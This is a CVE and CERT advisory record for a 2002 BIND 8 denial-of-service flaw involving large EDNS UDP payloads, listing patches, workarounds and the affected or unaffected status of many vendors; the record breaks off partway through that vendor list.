ID CVE-2002-1220 Type cve Reporter cve@mitre.org Modified 2018-05-03T01:29:00
Description
BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.
{"osvdb": [{"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2002-1220"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-029.txt.asc)\nISS X-Force ID: 10332\n[CVE-2002-1220](https://vulners.com/cve/CVE-2002-1220)\nCERT VU: 229595\nCERT: CA-2002-31\nBugtraq ID: 6161\n", "modified": "2002-11-12T00:00:00", "published": "2002-11-12T00:00:00", "id": "OSVDB:9724", "href": "https://vulners.com/osvdb/OSVDB:9724", "title": "ISC BIND OPT Resource Record Large UDP Payload DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-1220"], "description": "### Overview \n\nA remotely exploitable denial-of-service vulnerability exists in BIND. Based on recent reports, we believe this vulnerability is being actively exploited.\n\n### Description \n\nA remotely exploitable denial-of-service vulnerability exists in BIND 8.3.0 - 8.3.3. ISC's [description](<http://www.isc.org/products/BIND/bind-security.html>) of this vulnerability states:\n\n`When constucting [sic] a response a NXDOMAIN response to a ENDS query with a large UDP size it is possible to trigger an assertion.` \n \n--- \n \n### Impact \n\nThe BIND daemon will shut down. As a result, clients will not be able to connect to the service to resolve queries. \n \n--- \n \n### Solution \n\nApply a patch from your vendor. In the absence of a patch, you may wish to consider ISC's recommendation, which is upgrading to \"BIND 4.9.11, BIND 8.2.7, BIND 8.3.4 or preferably BIND 9.\" Additionally, ISC indicates, \"BIND 4 is officially deprecated. Only security fixes will be issued for BIND 4.\" \n \n--- \n \nDisable recursion if possible. 
\n \n--- \n \n### Vendor Information\n\n229595\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: February 26, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server with BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3 \n\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server \n \nThis is addressed in Security Update 2002-11-21 \n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 12, 2002 Updated: February 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://ftp.support.compaq.com/patches/public/unix/v4.0g/t64v40gb17-c0028000-16638-es-20030129.README>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: December 09, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. 
Temporary patches will be available through an efix package by 11/22/2002 or before. The efix will be available at the following URL: \n \n[_ftp://ftp.software.ibm.com/aix/efixes/security/dns_named_efix.tar.Z_](<ftp://ftp.software.ibm.com/aix/efixes/security/dns_named_efix.tar.Z>) \n \nIn the interim, customers may want to implement the workarounds given in the Solutions section to limit their exposure. \n \nThe following APARs will be available in the near future: \n \nAIX 4.3.3 APAR IY37088 (available approx 11/27/2002) \nAIX 5.1.0 APAR IY37019 (available approx 12/18/2002) \nAIX 5.2.0 APAR TBA (available approx TBA) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOlder releases (6.2, 7.0) of Red Hat Linux shipped with versions of BIND which may be vulnerable to these issues however a Red Hat security advisory in July 2002 upgraded all our supported distributions to BIND 9.2.1 which is not vulnerable to these issues. \n\n\nAll users who have BIND installed should ensure that they are running these updated versions of BIND. 
\n \n<http://rhn.redhat.com/errata/RHSA-2002-133.html> Red Hat Linux \n<http://rhn.redhat.com/errata/RHSA-2002-119.html> Advanced Server 2.1\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### The OpenPKG Project __ Affected\n\nUpdated: November 19, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n`OpenPKG Security Advisory The OpenPKG Project \n``<http://www.openpkg.org/security.html>`` ``<http://www.openpkg.org>`` \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-2002.011 15-Nov-2002 \n________________________________________________________________________ \n` \n`Package: bind, bind8 \nVulnerability: denial of service, arbitrary code execution \nOpenPKG Specific: no \n` \n`Dependent Packages: none \n` \n`Affected Releases: Affected Packages: Corrected Packages: \nOpenPKG 1.0 <= bind-8.2.6-1.0.1 >= bind-8.2.6-1.0.2 \nOpenPKG 1.1 <= bind8-8.3.3-1.1.0 >= bind8-8.3.3-1.1.1 \nOpenPKG CURRENT <= bind8-8.3.3-2002082 >= bind8-8.3.3-20021114 \n` \n`Description: \nThe Internet Software Consortium (ISC) [1] has discovered or has been \nnotified of several bugs which can result in vulnerabilities of varying \nlevels of severity in BIND [2][3]. These problems include buffer overflows, \nstack revealing, divide by zero, null pointer dereferencing, and more [4]. \nA subset of these vulnerabilities exist in the BIND packages distributed by \nOpenPKG. \n` \n` Please check whether you are affected by running \"<prefix>/bin/rpm -qa | \ngrep bind\". 
If you have an affected version of the \"bind\" or \"bind8\" package \n(see above), upgrade it according to the solution below. \n` \n`Workaround: \nBecause disabling recursion or disabling DNSSEC is a workaround to only a \nsubset of the aforementioned problems, it is not a recommended approach. \n` \n`Solution: \nSince these vulnerabilities do not exist in BIND version 9.2.1, one solution \nsimply involves upgrading to it. The packages bind-9.2.1-1.1.0 in OpenPKG \n1.1 [5], and bind-9.2.1-20021111 in OpenPKG CURRENT [6] are both candidates \nin this respect. Be warned that although such later versions of BIND are \nstable, there exist large differences between BIND 8 and BIND 9 software. \n` \n` A lighter approach involves updating existing packages to newly patched \nversions of BIND 8. Select the updated source RPM appropriate \nfor your OpenPKG release [7][8][9], and fetch it from the OpenPKG FTP service \nor a mirror location. Verify its integrity [10], build a corresponding \nbinary RPM from it and update your OpenPKG installation by applying the \nbinary RPM [11]. For the latest OpenPKG 1.1 release, perform the following \noperations to permanently fix the security problem (for other releases \nadjust accordingly). 
\n` \n` $ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.1/UPD \nftp> get bind8-8.3.3-1.1.1.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig bind8-8.3.3-1.1.1.src.rpm \n$ <prefix>/bin/rpm --rebuild bind8-8.3.3-1.1.1.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/bind8-8.3.3-1.1.1.*.rpm \n# <prefix>/etc/rc bind8 stop start \n________________________________________________________________________ \n` \n`References: \n[1] ``<http://www.isc.org/>`` \n[2] ``<http://www.isc.org/products/BIND/>`` \n[3] ``<http://www.cert.org/advisories/CA-2002-31.html>`` \n[4] ``<http://www.isc.org/products/BIND/bind-security.html>`` \n[5] ``<ftp://ftp.openpkg.org/release/1.1/SRC/bind-9.2.1-1.1.0.src.rpm>`` \n[6] ``<ftp://ftp.openpkg.org/current/SRC/bind-9.2.1-20021111.src.rpm>`` \n[7] ``<ftp://ftp.openpkg.org/release/1.0/UPD/bind-8.2.6-1.0.2.src.rpm>`` \n[8] ``<ftp://ftp.openpkg.org/release/1.1/UPD/bind8-8.3.3-1.1.1.src.rpm>`` \n[9] ``<ftp://ftp.openpkg.org/current/SRC/bind8-8.3.3-20021114.src.rpm>`` \n[10] ``<http://www.openpkg.org/security.html#signature>`` \n[11] ``<http://www.openpkg.org/tutorial.html#regular-source>`` \n________________________________________________________________________ \n` \n`For security reasons, this advisory was digitally signed with \nthe OpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) \nof the OpenPKG project which you can find under the official URL \n``<http://www.openpkg.org/openpkg.pgp>`` or on ``<http://keyserver.pgp.com/>``. To \ncheck the integrity of this advisory, verify its digital signature by \nusing GnuPG (``<http://www.gnupg.org/>``). For example, pipe this message to \nthe command \"gpg --verify --keyserver keyserver.pgp.com\". 
\n________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n` \n`iEYEARECAAYFAj3VOcwACgkQgHWT4GPEy5/vEACgmA+lr37ybByyTT7Q9ZBgzJAU \nrvMAoOZMy6lDJryPLPg1NV+Wn21wE1qA \n=gSdl \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Trustix __ Affected\n\nUpdated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2002-0076 \n` \n`Package name: bind \nSummary: Remote exploit \nDate: 2002-11-15 \nAffected versions: TSL 1.1, 1.2, 1.5 \n` \n`- -------------------------------------------------------------------------- \nPackage description: \nBIND (Berkeley Internet Name Domain) is an implementation of the DNS \n(Domain Name System) protocols. BIND includes a DNS server (named), \nwhich resolves host names to IP addresses, and a resolver library \n(routines for applications to use when interfacing with DNS). \n` \n`Problem description: \nISS X-Force has found a number of problems in all BIND 8 series up to \nand including 8.2.6 and 8.3.3. Two of these can cause BIND to crash \ncausing a denial of service attack, whereas the last can be used to \nexecute arbitrary code on the victim. \n` \n \n`Action: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. 
\n` \n \n`Location: \nAll TSL updates are available from \n<URI:``<http://www.trustix.net/pub/Trustix/updates/>``> \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/updates/>``> \n` \n \n`About Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With focus on \nsecurity and stability, the system is painlessly kept safe and up to date \nfrom day one using swup, the automated software updater. \n` \n \n`Automatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n` \n` Get SWUP from: \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/software/swup/>``> \n` \n \n`Public testing: \nThese packages have been available for public testing for some time. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:``<http://www.trustix.net/pub/Trustix/testing/>``> \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/testing/>``> \n` \n \n`Questions? \nCheck out our mailing lists: \n<URI:``<http://www.trustix.net/support/>``> \n` \n \n`Verification: \nThis advisory along with all TSL packages are signed with the TSL sign key. 
\nThis key is available from: \n<URI:``<http://www.trustix.net/TSL-GPG-KEY>``> \n` \n` The advisory itself is available from the errata pages at \n<URI:``<http://www.trustix.net/errata/trustix-1.2/>``> and \n<URI:``<http://www.trustix.net/errata/trustix-1.5/>``> \nor directly at \n<URI:``<http://www.trustix.net/errata/misc/2002/TSL-2002-0076-bind.asc.txt>``> \n` \n \n`MD5sums of the packages: \n- -------------------------------------------------------------------------- \n- -------------------------------------------------------------------------- \n` \n \n`Trustix Security Team \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE92NuHwRTcg4BxxS0RAraRAJ0Q+GDhIUUv0gbgv91q1ZmnFqkTHACfaRST \nKUB6bSTouOiksfknm0Mc/6I= \n=brw5 \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this 
vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MontaVista Software __ Not Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMontaVista ships BIND 9, thus is not vulnerable to these advisories.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nominum __ Not Affected\n\nUpdated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNominum \"Foundation\" Authoritative Name Server (ANS) is not affected by this vulnerability. Also, Nominum \"Foundation\" Caching Name Server (CNS) is not affected by this vulnerability. Nominum's commercial DNS server products, which are part of Nominum \"Foundation\" IP Address Suite, are not based on BIND and do not contain any BIND code, and so are not affected by vulnerabilities discovered in any version of BIND.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nNotified: November 12, 2002 Updated: May 30, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this advisory is available from our web site: <http://www.xerox.com/security>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at 
this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### 3Com Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### AT&T Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Aks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe 
vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Alcatel __ Unknown\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-31 on security vulnerabilities in the ISC BIND implementation, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis has shown that the following products (OmniSwitch 6600, 7700, 8800) may be impacted. Customers may wish to contact their support for more details. The security of our customers' networks is of highest priority for Alcatel. Therefore we continue to test our product portfolio against potential ISC BIND security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Apache Software Foundation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Avaya Unknown\n\nNotified: November 
12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### BSDi Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or 
additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cisco Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cistron Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Command Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Compaq Computer Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information 
\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Conectiva Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Covalent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cray Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### CyberSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Data Fellows Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Debian Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Djbdns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor 
Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Engarde Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### F-Secure Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Finjan Software 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have 
feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### GFI Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 